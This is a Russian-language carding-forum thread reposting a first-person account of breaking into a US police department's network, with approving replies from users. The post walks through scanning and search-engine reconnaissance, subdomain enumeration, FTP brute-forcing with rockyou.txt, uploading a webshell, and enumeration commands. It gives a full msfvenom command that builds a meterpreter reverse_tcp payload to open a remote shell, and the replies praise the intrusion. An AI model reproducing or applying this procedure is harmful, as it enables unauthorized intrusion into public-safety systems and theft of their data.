Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Как я ломал копов USA

DiNo

Опытный user
Регистрация
10 Янв 2019
Сообщения
709
Реакции
56
Статья не моя. Все повествование пойдет от первого лица автора истории, по возможности постараюсь дополнить материал полезной инфой, для лучшего понимания.

Кидайте + если понравилось


Приветствую, мой дорогой читатель. В этой части я хочу рассказать тебе историю которая была проделана за один присест и затяг сигаретки. Пару дней ломал голову и сегодня решил всё таки изучить правда ли всё так плохо в плане ИБ в USA а именно в критических узлах..

Сегодня мы будет говорить о том как можно получить доступ к серверам и к локальной сетке целого ментовского департамента, лично мне было интересно изучать и потратить день на конечный результат и получить свою дозу андреналина и эндорфина.

Сразу отступаясь от начала хочу сказать одно. Не были зашифрованы или как то атакованы другие узлы сети копов.

Последние волосы с головы были сорваны, самовар заварен, пепельница помыта, носок натянут и началась работа по сбору информации:

1. информации о департаментах полиций во всех штатах;
2. был натравлен masscan на интересные подсети;
3. была выгружена вся возможная информация с боевого товарища Shodan ^ Fofa ^ Censys
Shodan — это первая (и, пожалуй, ведущая) поисковая система по Интернету вещей, существующая уже более семи лет.

4. были проенумерованы все возможные домены : sublist3r в помощь + словари для брута под доменов
5. были пробручены пассы сервисов на великий Rockyou.txt

К вечеру мой cherrytree был полон информации для анализа и дальнейшего мозгового штурма. Кто не знает что такое

CherryTree — это приложение предназначенное для записи коротких заметок и мыслей.

Томми ловит 3 звезды : копы преследуют нас
Скажу сразу, не стал до конца изучать и копать весь материал... Потому что на момент брута FTP сервиса на нужных IP, был получен ACCESS GRANTED на несколько штук. В основном старые файлы и дистрибутивы ПО 200x годов.
Но один из них нас и порадовал.

Были проверены права на запись и чтение, о Боги права на запись были, наш CherryTree тихо шепчет нам о том что на данном IP по ssl имеется веб морда..


e2944227105eb2d6d6ac8.png


Незамедлительно был залит WebShell, но он не сработал отдав ошибку Application Error.. была стянута пачка шеллов и один из них всё таки работал стабильно.

594f98064d1d2aacd5886.png




79b18d27579fd11e238ae.png




1e86ff0c00a1a7339f9c4.png


WHOAMI ? nt authority\network service

4dbd5f3b1d8a174f3adf7.png



5eb0859556eeff8e8da39.png


Проверяем в домене ли сервак? wmic computersystem get domain

ad7bd5e3e85831d2ef2d6.png


Посмотрим учетные записи ? net users


9ab8ec1fe404935e1bffd.png


msfvenom наш товарищ, твой выход! генерим простой .exe и забираем сессию, так как мы не преследуем цели коммерческого обогащения а лишь интереса ради делаем все агрессивно!!!
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ИП LPORT=порт -f exe > meterpreter.exe
кладем файлик в C:\temp\


156751fc3875ff84291e5.png


Ловим долгожданную сессию meterpreter и изучаем хост. Например ?


0dbeccf1b68d78d710a8d.png




2a9f2e9f993b143e3ecf7.png



Томми ловит 6 звезд : копы на танках...

Погуляем по папкам и файлам. Но креды, ФИО и другие данные не будут показываться в целях безопасности 5-й точки.


dad989dd2337ad25f7357.png




3545ee2e9f6732cce4c02.png




dd78463a4d392fe64c53e.png




35df8968747a043fc8fee.png


Моя мысль? Всё можно найти и поломать...

Главное терпение и немного удачи в нужное время.

Не стал дальше пробивать машины в локалке
Не стал повышаться в правах до админа или системы
Не стал захватывать АД..

Хотя всё это смог бы сделать, остановило лишь одно. я сделал то чего хотел изначально )
 

Lokrayng

Опытный user
Регистрация
3 Мар 2017
Сообщения
116
Реакции
0
прочитал в гта 5 звёзднабрал)))
 

iilii

Опытный user
Регистрация
26 Авг 2017
Сообщения
68
Реакции
0
Любопытный способ
 

konon

Интересующийся
Регистрация
22 Окт 2017
Сообщения
59
Реакции
1
Информативная война выходит
 

Vladser

Непроверенный
Регистрация
21 Апр 2020
Сообщения
6
Реакции
0
Вот сидишь такой со своей проблемой и думаешь, ее сложно реализовать, нужно больше знаний, ресурсов или чье-то помощь, и потихоньку можешь даже думать что это для тебя не реально, и вот как раз такие статьи дают вспомнить что в этом мире есть много возможностей и шансов, и если какой-то тип из-за простого интереса сломал базу департамента полиции в юса, то твои размышления о сложности мира полная хрень)) И ты довольный продолжаешь работать полный энтузиазма, у меня как-то так)
 

008

Опытный user
Регистрация
26 Авг 2017
Сообщения
67
Реакции
0
лайфхак
 

flime

Интересующийся
Регистрация
22 Окт 2017
Сообщения
56
Реакции
2
Ну ломал ты преувеличил
 

miza6

Опытный user
Регистрация
14 Авг 2017
Сообщения
120
Реакции
0
сильно на самом деле если правда
 

konon

Интересующийся
Регистрация
22 Окт 2017
Сообщения
59
Реакции
1
мне бы такой скил
 

nnOvAk

Опытный user
Регистрация
20 Мар 2016
Сообщения
77
Реакции
1
такой вари не для наших мусоров
 

mirovoi

Опытный user
Регистрация
29 Авг 2017
Сообщения
87
Реакции
2
скорее наши копы нас ломают))
 
Сверху Снизу